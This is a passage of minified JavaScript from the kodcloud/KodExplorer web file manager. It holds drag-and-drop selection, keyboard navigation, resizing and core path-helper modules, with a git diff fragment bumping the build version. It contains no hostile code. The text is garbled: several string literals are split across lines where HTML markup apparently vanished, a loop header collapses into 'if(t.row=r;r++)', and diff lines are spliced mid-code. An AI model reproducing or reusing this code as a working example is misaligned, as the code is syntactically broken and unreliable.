a=ui.tree.zTree(),i=a.getNodeByTId($(this).parent().attr("id"));setTimeout(function(){i.isParent=!0,a.reAsyncChildNodes(i,"refresh")},100)}}).die("mouseleave").live("mouseleave",function(){t&&($(this).removeClass("curDropTreeNode"),clearTimeout(e),e=!1)})},o=function(){$(".header-middle .yarnlet a").die("mouseenter").live("mouseenter",function(){t&&$(this).addClass("curDropToPath")}).die("mouseup").live("mouseup",function(){t&&$(this).removeClass("curDropToPath")}).die("mouseleave").live("mouseleave",function(){t&&$(this).removeClass("curDropToPath")})},s=function(e){return"icon"==G.userConfig.listType?e.hasClass("folder-box")||e.hasClass("menu-recycle-button")?!0:!1:"list"==G.userConfig.listType?e.hasClass("folder-box")||e.hasClass("menu-recycle-button")||0!=e.find(".children-more-cert").length?!0:!1:"split"==G.userConfig.listType?e.hasClass("folder-box")||e.hasClass("menu-recycle-button")||0!=e.find(".children-more-cert").length?!0:!1:void 0},r=function(e){if("split"==G.userConfig.listType&&s(e)&&1==ui.fileLight.fileListSelect().length){var t=ui.fileLight.path(e);ui.path.history.add(t),ui.fileContent.pathChildrenSplit(t,function(){c(t)})}},l=function(){var e=".file-list-split .split-box",t="split-hover";$(e).live("mouseenter",function(){$(e).removeClass(t),$(this).addClass(t)}).die("mouseleave").live("mouseleave",function(){$(this).removeClass(t)}).die("click").live("click",function(){c(ui.fileLight.path($(this)))}).die("mousedown").live("mousedown",function(e){var t=$(e.target).parents(".file");(0==t.length||0==t.find(".children-open").length)&&c(ui.fileLight.path($(this)))})},c=function(e){var t=$(".file-list-split .split-box"),a=$('.file-list-split .split-box[data-path="'+pathHashEncode(e)+'"]'),i=$('.file-list-split .split-box .file[data-path="'+pathHashEncode(e)+'"]'),n="split-select";0==a.length&&(a=t.last()),t.removeClass(n),a.addClass(n),0==ui.fileLight.fileListSelect().length&&i.addClass("select"),ui.fileLight.select();var o=a.data("jsonData");o&&e&&(ui.fileContent.pathTypeChange(o),G.thisPath=e,G.jsonData=o,ui.headerAddress.addressSet()),ui.fileLight.init()},d=function(e){return e.hasClass("menuSharePath")||e.hasClass("systemBox")?!1:!0},p=function(e){$("body").removeClass("cursor-mouse cursor-warning cursor-move cursor-down cursor-add"),e&&$("body").addClass("cursor-mouse cursor-"+e)},u=function(){var a,i,n,o=150,s=!1,r=!1,l=0,c=!1,u=-15,f=10,h=0,m=0,v="selectDragDraging";$(Config.FileBoxClass).die("mousedown").live("mousedown",function(t){if(!t.shiftKey){if(ui.isEdit())return!0;if(1!=t.which||e)return!0;a=$(this),d(a)&&(y(t),$.browser.mozilla||this.setCapture&&this.setCapture(),$(document).mousemove(function(e){k(e)}),$(document).keydown(function(e){k(e)}),$(document).keyup(function(e){k(e)}),$(document).one("mouseup",function(e){N(e),this.releaseCapture&&this.releaseCapture()}))}});var g,b,y=function(e){$.contextMenu.hidden(),t=!0,l=$.now(),h=e.pageY,m=e.pageX,i=$(document).height(),n=$(document).width(),r=$(e.target).parents(".file")},k=function(e){if(!t)return!0;if(window.getSelection?window.getSelection().removeAllRanges():document.selection.empty(),$.now()-l>o&&!c&&(L(),s=$(".draggable-dragging"),s.attr("data-beforeInfo",s.find("span").html())),c){var a=e.clientX>=n-50?n-50:e.clientX,r=e.clientY>=i-50?i-50:e.clientY;return a=0>=a?0:a,r=0>=r?0:r,a-=u,r-=f,s.css({left:a,top:r}),x(e),E(a-m+u,r-h+f),!0}},x=function(e){clearTimeout(g),g=!1,g=setTimeout(function(){try{w(e)}catch(t){}},10)},w=function(e){var t=e.ctrlKey||e.metaKey,a=function(e,t){G.sid!==void 0&&(e="none"),void 0!=t&&0!==t.search(G.KOD_GROUP_PATH)&&0!==t.search(G.KOD_USER_RECYCLE)&&core.isSystemPath(t)&&(e="clear");var a=htmlEncode(core.pathThis(t)),i=" "+s.attr("data-beforeInfo").replace(/<[^<>]+>/g,""),n={copyTo:''+LNG.copy_to+'"'+a+'"',moveTo:''+LNG.cute_to+'"'+a+'"',remove:''+LNG.remove+i+"",share:''+LNG.share+i+"",none:''+LNG.no_permission_write+"",clear:s.attr("data-beforeInfo")};t==G.thisPath&&(n.copyTo=''+LNG.clone+""),s.find("span").html(n[e]),s.attr("data-actionType",e),s.attr("data-actionPath",t);var n={copyTo:"add",moveTo:"move",remove:"move",share:"add",none:"default",clear:"default"};p(n[e])};if(t||0!=$(".file-select-drag-temp").length||0!=$(".curDropTreeNode").length||0!=$(".curDropToPath").length){var i=ui.fileLight.path($(".file-select-drag-temp"));if(0!=$(".curDropTreeNode").length){var n=ui.tree.zTree(),o=n.getNodeByTId($(".curDropTreeNode").parent().attr("id"));i=o.path}0!=$(".curDropToPath").length&&(i=$(".curDropToPath").attr("data-path")),i||(i=G.thisPath),$(".file-select-drag-temp").hasClass("menu-recycle-button")?a("remove"):t?a("copyTo",i):a("moveTo",i)}else if(0!=$(".recycle-hover").length)a("remove");else if(0!=$(".share-hover").length&&1>=ui.fileLight.fileListSelect().length)a("share");else{var i=G.thisPath;"split"==G.userConfig.listType&&$(".split-hover").length>0?(i=ui.fileLight.path($(".split-hover")),t?a("copyTo",i):$(".split-hover").hasClass("split-select")?a("clear"):a("moveTo",i)):a("clear")}},N=function(){if(!t)return!1;if(clearTimeout(g),t=!1,c=!1,$("body").removeClass(v),s){s.addClass("animated-300").addClass("flipOutXLine").fadeOut(200,function(){s.remove(),s=!1});var e=function(e,t){switch(e){case"copyTo":ui.path.copyDrag(t,!0);break;case"moveTo":ui.path.cuteDrag(t);break;case"remove":ui.path.remove(!0);break;case"share":ui.path.share();break;default:}},a=s.attr("data-actionType");-1!=$.inArray(a,["copyTo","moveTo","remove","share"])?j(!1):j(!0),e(a,s.attr("data-actionPath")),p(!1)}},L=function(){$("body").addClass(v);var e=ui.fileLight.fileListSelect().length;$('
    '+e+'
    '+e+" "+LNG.file+"
    ").appendTo("body"),c=!0,setTimeout(A,20)},_=0,C=5,T=35,S=20,D=50,A=function(){clearTimeout($(".file-draging-box").data("removeDelay")),$(".file-draging .file").stop(),$(".file-draging-box").remove();var e={icon:"file-list-icon",list:"file-list-list",split:"file-list-split"},t=e[G.userConfig.listType];$("
    ").appendTo("body"),b=$(Config.SelectClass).filter("[data-path!='']");var a=b.clone();(b.length>=D||$.browser.msie)&&(a=r.clone()),a.appendTo(".file-draging"),a.each(function(e){var t=$(".bodymain .file-continer .file[data-path='"+$(this).attr("data-path")+"']"),i=t.offset();$(this).css({left:i.left,top:i.top,width:t.width()}),$(this).data({"data-left":i.left,"data-top":i.top,"data-animateTime":200+e*C,"data-sizeAdd":_*e}),$(this).attr("data-path")==r.attr("data-path")&&$(this).addClass("handle_target"),1==a.length&&($(this).data({"data-animateTime":0}),S=0)}),b.addClass("item-file-draging");var i=setTimeout(function(){$(".file-draging-box").data("animate","finished");var e=$(".draggable-dragging");a.each(function(){var t=$(this),a=$(this).data("data-sizeAdd"),i=$(this).data("data-animateTime");$(this).data("status","ready"),$(this).animate({opacity:1},{duration:i,easing:"swing",progress:function(i,n){var o=t.offset(),s=e.offset(),r=(s.left+a-o.left)*n,l=(s.top+a+T-o.top)*n;t.css({left:o.left+r,top:o.top+l})},complete:function(){t.data("status","finished")}})})},S);$(".file-draging-box").data("dragDelay",i),$(".file-draging-box").data("animate","ready")},E=function(e,t){return"finished"!=$(".file-draging-box").data("animate")?($(".file-draging .file").each(function(){$(this).css({left:$(this).data("data-left")+e,top:$(this).data("data-top")+t})}),void 0):($(".file-draging .file").each(function(){if("finished"==$(this).data("status")){var e=$(this).data("data-sizeAdd"),t=$(".draggable-dragging").offset();$(this).css({left:t.left+e,top:t.top+e+T})}}),void 0)},j=function(e){var t=$(".file-draging .file").length;clearTimeout($(".file-draging-box").data("dragDelay")),$(".file-draging .file").each(function(t){var a=t*C,i=$(".bodymain .file-continer .file[data-path='"+$(this).attr("data-path")+"']");e?$(this).stop().animate({left:$(this).data("data-left"),top:$(this).data("data-top")},250+a,function(){b.removeClass("item-file-draging")}).animate({opacity:0},150,function(){$(this).remove()}):(i.stop().animate({opacity:1},100),$(this).stop().animate({opacity:0},200+a,function(){$(this).remove()}))});var a=setTimeout(function(){$(".file-draging-box").remove()},400+C*t);$(".file-draging-box").data("removeDelay",a)}},f=function(){var a=null,i=null,n=null,o=0,s=0,r=0,l=0,c="",d="bodymain";core.isApp("desktop")&&(d="file-continer");var p=$("."+d);p.die("mousedown").live("mousedown",function(e){if(!($(e.target).hasClass(d)&&20>$(document).width()-e.pageX)){if(r=$(".file-continer").outerHeight(),l=p.outerHeight(),ui.isEdit())return!0;if(1!=e.which||t)return!0;u(e),this.setCapture&&this.setCapture(),$(document).unbind("mousemove").mousemove(function(e){f(e)}),$(document).one("mouseup",function(e){clearTimeout(c),c=!1,v(e),this.releaseCapture&&this.releaseCapture()})}});var u=function(t){s=p.offset().left-p.scrollLeft(),o=p.offset().top-p.scrollTop(),"split"==G.userConfig.listType&&(o+=$(t.target).parents(".split-box").scrollTop()),$(t.target).parent().hasClass(Config.FileBoxClassName)||$(t.target).parent().parent().hasClass(Config.FileBoxClassName)||$(t.target).hasClass("fix")||($.contextMenu.hidden(),t.ctrlKey||t.metaKey||t.shiftKey||ui.fileLight.clear(),$(t.target).hasClass("ico")||(a=t.pageX-s,i=t.pageY-o,c=setTimeout(function(){e=!0,0==$(".select-container").length&&$('
    ').appendTo(Config.FileBoxSelector),n=$(".select-container")},100)))},f=function(t){if(!e)return!0;var o=t.pageX-p.offset().left+p.scrollLeft(),s=t.pageY-p.offset().top+p.scrollTop(),c=Math.abs(o-a),d=Math.abs(s-i);s>i&&d>r-i&&r>l&&(d=r-i),h(s,i,d,p),n.css({left:Math.min(o,a)+2,top:Math.min(s,i)+2,width:c,height:d}),1e3>ui.fileLight.fileListAll().length&&m()},h=function(e,t,a,i){var n=i.outerHeight(),o=i.scrollTop(),s=o;if(e>t){var r=t+a,l=n+o,c=r-l;c>0?s+=c:-n>c&&(s+=n-Math.abs(c))}else if(t>e){var d=t-a,p=o,c=d-p;0>c?s+=c:c>n&&(s+=Math.abs(c)-n)}s!==o&&i.stop(!0,!1).animate({scrollTop:s},100)},m=function(){for(var e=n.offset().left-p.offset().left+p.scrollLeft(),t=n.offset().top-p.offset().top+p.scrollTop(),a=e+n.width(),i=t+n.height(),o=ui.fileLight.fileListAll(),s=0;o.length>s;s++){var r=o[s],l=$(o[s]),c=l.parent().scrollTop(),d=r.offsetLeft,u=r.offsetTop-c,f=d+l.width(),h=u+l.height();if("split"==G.userConfig.listType&&(d+=l.parents(".split-box")[0].offsetLeft,f=d+l.width()),a-e+f-d>Math.abs(e+a-(d+f))&&i-t+h-u>Math.abs(t+i-(u+h))){if(!l.hasClass("file-select-drag-temp")){if(l.hasClass("selectToggleClass"))continue;if(l.hasClass(Config.SelectClassName)){l.removeClass(Config.SelectClassName).addClass("selectToggleClass"),ui.fileLight.resumeMenu(l);continue}l.addClass("file-select-drag-temp")}}else l.removeClass("file-select-drag-temp"),l.hasClass("selectToggleClass")&&l.addClass(Config.SelectClassName).removeClass("selectToggleClass")}},v=function(){return e?(m(),n.remove(),$(".file-select-drag-temp").addClass(Config.SelectClassName).removeClass("file-select-drag-temp"),$(".selectToggleClass").removeClass("selectToggleClass"),ui.fileLight.select(),e=!1,a=null,i=null,void 0):!1}},h=function(e,t){var a=$(".file-list-split .split-box.split-select");if(e)a=e.parents(".split-box");else if(0!=ui.fileLight.fileListSelect().length){var i=ui.fileLight.fileListSelect().last();a=i.parents(".split-box")}return a.find(t)},m={fileListAll:function(e){return"split"!=G.userConfig.listType?ui.fileLight.fileListAll():h(e,".file")},fileListSelect:function(e){return"split"!=G.userConfig.listType?ui.fileLight.fileListSelect():h(e,".file.select")}},v=function(e){var t=m.fileListAll(),a=m.fileListSelect(),i=t.length-1,n=0,o=ui.getColfileNumberDesktop(),s=t.index(a.first()),r=t.index(a.last());switch(e){case"pageup":case"up":n=0>=s||0==s%o?s:s-1;break;case"left":n=0>=s-o?0:s-o;break;case"pagedown":case"down":n=r>=i||0==(r+1)%o?r:r+1;break;case"right":n=r+o>=i?i:r+o;break;default:}return t.eq(n)},g=function(e){if(core.isApp("desktop"))return v(e);var t=m.fileListAll(),a=m.fileListSelect(),i=t.length-1,n=0,o=ui.getRowfileNumber(),s=ui.getPagefileNumber(),r=t.index(a.first()),l=t.index(a.last());switch(e){case"up":n=0>=r-o?0:r-o,n=b(n,!1);break;case"left":n=0>=r?0:r-1;break;case"down":n=l+o>=i?i:l+o,n=b(n,!0);break;case"right":n=l>=i?l:l+1;break;case"pageup":n=0>=r-s?0:r-s,n=b(n,!1);break;case"pagedown":n=l+s>=i?i:l+s,n=b(n,!0);break;default:}return t.eq(n)},b=function(e,t){for(var a=m.fileListAll(),i=a.eq(e),n=a.length;0!=i.parents(".hidden").length;){if(t?e++:e--,0>=e||e>=n)return e;i=a.eq(e)}return e},y=function(e){var t,a=m.fileListAll(),i=m.fileListSelect(),n="",o=!1;switch(e.indexOf("shift+")>=0&&(o=!0,e=e.replace("shift+","")),e){case"home":n=i.last(),t=a.first();break;case"end":n=i.first(),t=a.last(); break;case"left":n=i.last(),t=g(e);break;case"up":n=i.last(),t=g(e);break;case"right":n=i.first(),t=g(e);break;case"down":n=i.first(),t=g(e);break;case"pageup":n=i.last(),t=g(e);break;case"pagedown":n=i.first(),t=g(e);break;case"all":t=a;break;default:}if(!x(e)){if(o&&""!=n){var s=a.index(n),r=a.index(t);if(s>r){var l=s;s=r,r=l}return w(s,r,a),void 0}k(t)}},k=function(e){0!=e.length&&(ui.fileLight.clear(),e.addClass(Config.SelectClassName),ui.fileLight.select(),ui.fileLight.setInView(),"split"==G.userConfig.listType&&1==e.length&&r($(ui.fileLight.fileListSelect()[0])))},x=function(e){var t=$(ui.fileLight.fileListSelect()[0]);if("icon"==G.userConfig.listType)return!1;switch(e){case"left":if("list"==G.userConfig.listType)if(1==t.find(".children-more-cert.cert-open").length)t.find(".children-more-cert").removeClass("cert-open"),t.next().addClass("hidden");else{var a=t.parent(".children-list").prev(".file");k(a)}else if("split"==G.userConfig.listType){var a=t.parents(".split-box").prev().find(".select-split-parent");k(a)}break;case"right":if("list"==G.userConfig.listType)1==t.find(".children-more-cert").length&&(ui.fileContent.pathChildrenTree(t),t.find(".children-more-cert").addClass("cert-open"),t.next().removeClass("hidden"));else if("split"==G.userConfig.listType){var a=t.parents(".split-box").next().find(".file:eq(0)");k(a)}break;default:return!1}return!0},w=function(e,t,a){if(core.isApp("desktop"))return N(e,t,a);ui.fileLight.clear();for(var i=e;t>=i;i++)$(a[i]).addClass(Config.SelectClassName);ui.fileLight.select()},N=function(e,t,a){var i=ui.getColfileNumberDesktop(),n=Math.ceil(m.fileListAll().length/i),e={row:e%i,col:parseInt(e/i)},t={row:t%i,col:parseInt(t/i)};if(t.row=r;r++){var l=0,c=n;r==e.row&&(l=e.col),r==t.row&&(c=t.col);for(var d=l;c>=d;d++)s(r,d)}ui.fileLight.select()};return{init:function(){i(),l(),u(),f()},isDraging:function(){return t},selectSplit:c,selectPos:y}}),define("app/src/explorer/fileListResize",[],function(){var e={filename:250,filetype:80,filesize:80,filetime:150,explorerTreeWidth:199,editorTreeWidth:199},t={filename:150,filetype:60,filesize:60,filetime:120,explorerTreeWidth:2,editorTreeWidth:2},a=e,i=function(){if(LocalData.get("resizeConfig"))a=jsonDecode(LocalData.get("resizeConfig"));else{G.userConfig.resizeConfig!==void 0&&(a=jsonDecode(htmlDecode(G.userConfig.resizeConfig)));var i=jsonEncode(a);LocalData.set("resizeConfig",i)}$.each(e,function(i){(!a[i]||a[i]=a&&(a=t[e]),n+=a,i+=".file-list-list .file ."+e+",#main-title ."+e+"{width:"+a+"px;}")}),i+=".file-list-list .file{width:"+(n+50)+"px;}",$.setStyle(i,"header-resize-width")}},s=function(i,o,s){if(!$(".frame-left").is(":hidden")){var r=Config.pageApp+"TreeWidth",l=$.extend(!0,{},a);l[r]+=i,l[r]<=t[r]&&(l[r]=t[r]);var c=l[r],d=$(".frame-left"),p=$(".frame-resize"),u=$(".frame-right"),f=e[r];if(c>f-8&&f+8>c&&(c=f+1),s){var h=400;d.animate({width:c},h),p.animate({left:c-5},h),u.animate({left:c},h)}else d.css("width",c),p.css("left",c-5),u.css("left",c);ui.setStyle!==void 0&&ui.setStyle(),o&&(a=l,n())}},r=function(){return void 0!=$.getUrlParam("type")?!0:!1},l=function(e,i,s){var r=$.extend(!0,{},a);r[e]+=i,o(r),s&&(a=r,$.each(a,function(e,i){t[e]>=i&&(a[e]=t[e])}),n())},c=function(){$("#main-title").hasClass("bind-init")||(o(a),$("#main-title").addClass("bind-init"),$.each(e,function(e){$("#main-title ."+e+"-resize").drag({start:function(){},move:function(t){l(e,t,!1)},end:function(t){l(e,t,!0)}})}))},d=function(){var e=$(".frame-resize");e.drag({start:function(){e.addClass("active"),$(".resize-mask").css("display","block")},move:function(e){s(e,!1,!1)},end:function(t){s(t,!0,!1),e.removeClass("active"),$(".resize-mask").css("display","none")}})},p=function(){var e="fileIconSize";core.isApp("desktop")&&(e="fileIconSizeDesktop");var t=G.userConfig[e];t||(t="75"),h(t,!1),u(t)},u=function(e){$(".set-file-icon-size .file-icon-size").removeClass("selected");for(var t=[["40","box-size-smallx"],["60","box-size-small"],["80","box-size-default"],["100","box-size-big"],["120","box-size-bigx"]],a=10,i="",n=0;t.length>n;n++){var o=parseInt(t[n][0]);if(e>=o-a&&o+a>=e){i=t[n][1];break}}""!=i&&$("."+i).addClass("selected")},f=function(e){var t="fileIconSize";core.isApp("desktop")&&(t="fileIconSizeDesktop"),G.userConfig[t]=e,u(e),$.get(G.appHost+"setting/set&k="+t+"&v="+e)},h=function(e,t){var a=e,i=105,n=30,o=250;core.isApp("desktop")&&(n=40,o=150),a=n>=a?n:a,a=a>=o?o:a;var s=(e-n)*i/(o-n),r=20,l=10,c=parseInt(a),d=c+2*r-l+5,p=c-l,u=c-l,h=.4*c,m=c+3*r-l,v=".file-list-icon div.file,.file-list-icon .flex-empty{height:"+d+"px;width:"+c+"px;}";core.isApp("desktop")&&(d-=5,v="div.file-list-icon div.file,.file-list-icon .flex-empty{height:"+d+"px;width:"+c+"px;}"),$.browser.mozilla&&(u-=4);var g="div.file-list-icon div.file{max-height:"+m+"px;}"+v+" .file-list-icon .meta-info{height:"+h+"px;width:"+h+"px; margin-right:"+.16*h+"px;margin-top:-"+1.1*h+"px;} .file-list-icon div.file .filename{width:"+c+"px;} .file-list-icon div.file .filename #pathRenameTextarea, .file-list-icon div.file .filename .newfile{width:"+c+"px;} .file-list-icon div.file .ico{padding-left:"+l/2+"px;height:"+u+"px;width:"+p+"px} .file-list-icon div.file .ico.picture{width:"+p+"px;padding-left:"+l/2+"px;overflow:hidden;}";$.setStyle(g,"file_icon_resize"),$(".slider-handle").css("top",s),t&&f(e)},m=function(){var e,t=$(".slider-handle");$(".set-icon-size-slider").bind("click",function(e){return stopPP(e),!1});var a=function(t){var a=0,i=105,n=30,o=250,s=e+t;s=a>s?a:s,s=s>i?i:s;var r=parseInt(s/i*(o-n)+n);return h(r,!1),r};t.drag({start:function(){t.addClass("active"),e=parseInt(t.css("top"))},move:function(e,t){a(t)},end:function(e,i){t.removeClass("active"),f(a(i),!0)}});var i=$(".slider-bg");$(".slider-bg").unbind("click").bind("click",function(t){var n=t.clientY-i.offset().top;e=0,f(a(n),!0)})},v=function(){var e=function(e,t){var a=e.parent(),i=$(".split-box").index(a),n=parseInt(a.data("before_width"))+t;if(!(150>n)){$($(".split-line").get(i)).css("width",n),a.css("width",n),$(".split-box:gt("+i+")").each(function(){$(this).hasClass("is-drag-split")||$(this).css("left",parseInt($(this).data("before_left"))+t+"px")});var o=[];$(".split-box").each(function(){o.push({left:$(this).css("left"),width:$(this).width()})}),LocalData.set("splitBoxSize",jsonEncode(o))}};$(".bodymain .file-list-split .split-drag").drag({start:function(e,t){var a=t.parent();a.addClass("is-drag-split").data("before_width",a.width()),$(".split-box,.split-line").each(function(){$(this).data("before_left",$(this).css("left"))})},move:function(t,a,i,n){e(n,t)},end:function(e,t,a,i){i.parent().removeClass("is-drag-split")}},!0),$(".file.select-split-parent").removeClass("select-split-parent"),$(".split-box").each(function(){$('.file[data-path="'+$(this).attr("data-path")+'"]').addClass("select-split-parent")}),g()},g=function(){var e=jsonDecode(LocalData.get("splitBoxSize")),t=0;e||(e=[]);var a=function(a,i){var n=e[i];n||(n={width:250,left:t}),t+=n.width+1,a.css({width:n.width+"px",left:n.left})};t=0,$(".split-box").each(function(e){a($(this),e)}),t=0,$(".split-line").each(function(e){a($(this),e)}),$(".bodymain").scrollLeft(1e5)};return{init:function(){i(),r()&&(a=e),o(a),d(),s(0,!1,!0),m()},initFileSize:p,bindSplitResize:v,bindHeaderResize:c,setFileIconSize:h}}),define("app/src/explorer/options",[],function(){var e=function(){"0"==_.get(window,"G.userConfig.fileSelect")&&$.addStyle(".file-continer .file .item-select, .file-continer .file .item-menu{display:none !important;}")},t=function(){"0"==_.get(window,"G.userConfig.imageThumb")&&Hook.bind("explorer.list.fileThumb",function(e,t){var a="icon"!=G.userConfig.listType,i=["jpg","jpeg","png","bmp","gif","ico","svg","cur","webp"];return console.log(e,t),inArray(i,t)?"
    "+core.icon(t,a)+"
    ":void 0})};return{init:function(){e(),t()}}}); \ No newline at end of file diff --git a/static/js/app/src/edit/main.js b/static/js/app/src/edit/main.js index 116035e..9c12e28 100755 --- a/static/js/app/src/edit/main.js +++ b/static/js/app/src/edit/main.js @@ -1,6 +1,7 @@ -/*! power by kodcloud ver4.05(2017-08-26) [build 1503738026262] */ +/*! power by kodcloud ver4.06(2017-08-30) [build 1504089913395] */ var animate_time=160;define("app/src/edit/main",["lib/jquery-lib","lib/util","lib/contextMenu/jquery-contextMenu","lib/artDialog/jquery-artDialog","../../common/core","../../common/rightMenuExtence","../../app/appBase","../../app/editor","../../app/openWith","../../app/html","./edit","./preview","./previewMarkdown","./functionList","./markdownTools","lib/ace/src-min-noconflict/ext-modelist","./taskTap","./toolbar"],function(e){e("lib/jquery-lib"),e("lib/util"),e("lib/contextMenu/jquery-contextMenu"),e("lib/artDialog/jquery-artDialog"),core=e("../../common/core"),Editor=e("./edit"),Tap=e("./taskTap"),Toolbar=e("./toolbar"),rightMenu=Tap.rightMenu,Editor.fileOpenMode={ini:["inc","inf","strings"],xml:["xib","xsd","storyboard","plist","csproj","pch","pbxproj","xcscheme","config","vcproj","vcxproj","filters","webloc","opf","ncx"],json:["oexe","jshintrc","sublime-project"],c_cpp:["nc"],markdown:["readme","changes","version","license","changelog"]},Editor.fileModeSet=function(e,t){"string"==$.type(e)&&(e=e.split(",")),Editor.fileOpenMode[t]=Editor.fileOpenMode[t]?Editor.fileOpenMode[t].concat(e):e},$(document).ready(function(){core.init(),Editor.init(),Toolbar.init(),Tap.init(),e.async("lib/code_beautify"),$("a,img").attr("draggable","false"),Hook.trigger("edit.main.init"),setTimeout(function(){t()},300);var t=function(){var e=window.location.href.indexOf("#filename=");if(e>0){var t=window.location.href.substr(e+"#filename=".length);return Editor.add(t),void 0}Editor.getParentEditor(function(e){for(var t=e.ui.fileHistory(),a=0;t.length>a;a++)Editor.add(t[a]);0==t.length&&Editor.add("")})};$(window).bind("resize",function(){Tap.resetWidth("resize")}),navigator.userAgent.match(/(iPhone|iPod|Android|ios)/i)&&"1"===Cookie.get("forceWap")&&$("body").addClass("forceWap"),window.onbeforeunload=function(){return Editor.hasFileSave()?LNG.if_save_file:void 0}})}),define("app/common/core",["./rightMenuExtence","../app/appBase","../app/editor","../app/openWith","../app/html"],function(require,exports){tplUpload=require("./tpl/upload.html"),tplFormMake=require("./tpl/formMake.html");var tools=require("./core.tools"),upload=require("./core.upload"),api=require("./core.api"),playSound=require("./core.playSound"),formMake=require("./core.formMake");require("./rightMenuExtence"),kodApp=require("../app/appBase"),require("../app/editor"),require("../app/openWith"),require("../app/html"),pathHashEncode=function(e){return hashEncode(e)},pathHashDecode=function(e){return hashDecode(e)};var initTemplate=function(){window.require=require,template.config||(template.config=function(e,t){template.defaults[e]=t},template.helper=function(e,t){template.defaults.imports[e]=t}),template.config("escape",!1),template.config("compress",!0),template.helper("kod",{$:$,window:window,log:console.log,core:core,pathTools:window.pathTools,inArray:inArray}),template.defaults.imports.pathTools=window.pathTools,template.defaults.escape=!1,"_dev"==G.environment?(template.defaults.cache=!1,template.defaults.minimize=!1,template.defaults.compileDebug=!0):(template.defaults.cache=!0,template.defaults.minimize=!0,template.defaults.compileDebug=!1)},initFirst=function(){initTemplate(),"undefined"!=typeof G&&(1!=G.isRoot&&$(".menu-system-setting").remove(),G.isRoot||core.authCheck("systemMember.get")||1==core.authCheck("systemGroup.get")||$(".menu-system-group").remove(),G.userConfig&&"0"==G.userConfig.animateOpen&&($.dialog.defaults.animate=!1),resetHost()),$("html").bind("click",function(e){if(0==$(e.target).parents(".context-menu-list").length)try{$.contextMenu.hidden()}catch(e){}}),$.dialog.defaults.animate&&loadRipple(["a","button",".ripple-item",".context-menu-item","#picker",".menuShareButton",".menu-recycle-button",".section .list"],[".disabled",".disable",".ztree",".disable-ripple"]),$("a,img").attr("draggable","false"),$.ajaxSetup({headers:{"X-CSRF-TOKEN":Cookie.get("X-CSRF-TOKEN")}}),$(".common-footer [forceWap]").click(function(){var e=$(this).attr("forceWap");Cookie.set("forceWap",e),window.location.reload()}),core.setSkinDiy(),core.tools.init();for(var e=0;window.kodReady.length>e;e++)try{window.kodReady[e]()}catch(t){console.error("kodReady error:",t)}Hook.trigger("kodReady.end"),titleTips()},resetHost=function(){var e=window.location,t=e.port?":"+e.port:"";G.webHost=e.protocol+"//"+e.hostname+t+"/",G.appHost=rtrim(G.webHost,"/")+e.pathname.replace("index.php","")+"index.php?",G.appRoot=rtrim(G.webHost,"/")+e.pathname.replace("index.php",""),"1"==G.settings.paramRewrite&&(G.appHost=G.appHost.replace("index.php?","index.php/"))},titleTips=function(){isWap()||require.async(["lib/poshytip/jquery.poshytip.js","lib/poshytip/skin.css"],function(){var e=$("[title]");e.poshytip({className:"ptips-skin",liveEvents:!0,slide:!1,alignTo:"cursor",alignX:"right",alignY:"bottom",showAniDuration:150,hideAniDuration:200,offsetY:10,offsetX:20,showTimeout:function(){var e=1500;return $(this).attr("title-timeout")&&(e=parseInt($(this).attr("title-timeout"))),e},content:function(){var e=$(this).data("title.poshytip");if($(this).attr("title-data")){var t=$($(this).attr("title-data"));e=t.is("input")||t.is("textarea")?t.val():t.html()}return e=e?e:"",e.replace(/\n/g,"
    ")}}),$("body").bind("mousedown click",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()}),$("input,textarea").live("focus",function(){$(e).poshytip("hide"),$(".ptips-skin").remove()})})};return{init:initFirst,serverDwonload:upload.serverDwonload,upload:upload.upload,uploadInit:upload.init,playSound:playSound.playSound,playSoundFile:playSound.playSoundFile,tools:tools,api:api,formMake:formMake,getPathIcon:function(e,t){if(t=void 0==t?"":t,"string"==$.type(e)){var a=trim(trim(e),"/");if(e={},"{"!=a.substring(0,1)||a.split("/").length>1)return{icon:"",name:""};e.pathType=a.match(/\{.*\}/),e.id=a.split(":")[1]}var i={};i[G.KOD_USER_SHARE]={icon:"user-self",name:LNG.my_share},i[G.KOD_GROUP_PATH]={icon:"group-self-owner"},i[G.KOD_GROUP_SHARE]={icon:"group-guest"},i[G.KOD_USER_SELF]={icon:"user-self"},i[G.KOD_USER_RECYCLE]={icon:"recycle",name:LNG.recycle},i[G.KOD_USER_FAV]={icon:"tree-fav",name:LNG.fav},i[G.KOD_GROUP_ROOT_SELF]={icon:"group-self-root",name:LNG.my_kod_group},i[G.KOD_GROUP_ROOT_ALL]={icon:"group-root",name:LNG.kod_group};var n=i[e.pathType];return e.pathType==G.KOD_USER_SHARE&&G.userID!=e.id?n={icon:"user",name:t}:e.pathType==G.KOD_GROUP_PATH&&"owner"==e.role&&(n={icon:"group-self-owner"}),void 0==n&&(n={icon:"",name:""}),void 0==n.name&&(n.name=t),n},isSystemPath:function(e){var e=trim(trim(e),"/");if(void 0==e||"{"!=e.substring(0,1)||e.split("/").length>1)return!1;var t=e.match(/\{.*\}/),a=[G.KOD_USER_SHARE,G.KOD_GROUP_SHARE,G.KOD_USER_RECYCLE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL];return-1!==$.inArray(t[0],a)?!0:!1},pathPre:function(e){if(e=trim(trim(e),"/"),void 0==e||"{"!=e.substring(0,1))return"";var t=e.match(/\{.*\}/);return t[0]},contextmenu:function(e){try{$.contextMenu.hidden()}catch(t){}var t=e||window.event;return t?t&&$(t.target).is("textarea")||$(t.target).is("input")||$(t.target).is("p")||$(t.target).is("pre")||0!=$(t.target).parents(".can-right-menu").length||0!=$(t.target).parents(".topbar").length||0!=$(t.target).parents(".edit-body").length||0!=$(t.target).parents(".aui-state-focus").length?!0:!1:!0},pathThis:function(e){if(!e||"/"==e)return"";var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/"),i=t.substr(a+1);if(0==i.search("fileProxy")){i=urlDecode(i.substr(i.search("&path=")));var n=i.split("/");i=n[n.length-1],""==i&&(i=n[n.length-2])}return i},pathClear:function(e){if(!e)return"";var t=e.replace(/\\/g,"/");return t=t.replace(/\/+/g,"/"),t=t.replace(/\.+\//g,"/")},pathFather:function(e){var t=rtrim(this.pathClear(e),"/"),a=t.lastIndexOf("/");return t.substr(0,a+1)},pathExt:function(e){var t=trim(e,"/");return-1!=t.lastIndexOf("/")&&(t=t.substr(t.lastIndexOf("/")+1)),-1!=t.lastIndexOf(".")?t.substr(t.lastIndexOf(".")+1).toLowerCase():t.toLowerCase()},pathUrlEncode:function(e){if(!e)return"";var 